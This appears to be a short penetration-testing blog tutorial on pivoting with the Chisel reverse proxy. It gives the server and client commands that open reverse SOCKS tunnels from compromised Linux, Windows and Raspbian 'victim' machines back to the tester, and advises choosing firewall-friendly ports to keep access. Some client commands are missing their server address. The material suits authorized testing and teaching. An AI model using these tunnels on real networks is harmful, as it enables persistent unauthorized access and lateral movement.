Welcome, today I will talk about Pivoting with Chisel Reverse Proxy, in this tutorial we will get a reverse shell from each machine on the pentester machine. I assume you already gain access to all machines and you want to keep access to all networks. In case you need to install our tool visit chisel github page.

Chisel Reverse Proxy
Chisel Reverse Proxy

After we have all connections on our machine we will be able to scan each subnet using one port for each network using proxychains with dynamic chains and DNS resolution through our proxies. Using DNS resolution will be helpful to interact with a Domain Controller if we need it.

Pentester Machine

chisel server -p 8001 --reverse -v --keepalive 5s --socks5 25000
Server ParametersExplanation
-p 8001Port to start Listening
–reverseAllow client to create reverse connections
–socks5 25000Allow clients to create Socks5 proxies on port 25000
–keepalive 5sSend keep-alive packets to clients each 5 seconds
-vVerbose mode is great for troubleshooting and verifying new connections

Victim 1 – Linux Machine

chisel client 8001 --reverse R:socks:2000
Pivoting Networks- One Jump
Pivoting Networks- One Jump
Server ParametersExplanation IP address from our chisel server.
8001Port from our chisel server.
–reverseCreate a reverse proxy to chisel server
R:socks:2000Remote Socks5 on port 2000, chisel server will start listening on port 2000
vi /etc/proxychains4.conf
Chisel Reverse Proxy

Why port 2000?

I use it as an example to keep it simple, in the real world you want to use some common ports like 80,53,443,8080 usually, these ports are opened on network firewalls.

Victim 2 – Windows Server

chisel client 8001 --reverse R:socks:2001

Victim 3 – Raspbian

chisel client 8001 --reverse R:socks:2002

Chisel Reverse Proxy

chisel socks proxy example

chisel proxychains

chisel dynamic port forwarding

Pentester Machine Again

proxychains ssh

Oh hi there 👋 It’s nice to meet you.

Sign up to receive awesome content in your inbox, every month.

Read our privacy policy for more info.


Hacking tips!

We don’t spam! Read our privacy policy for more info.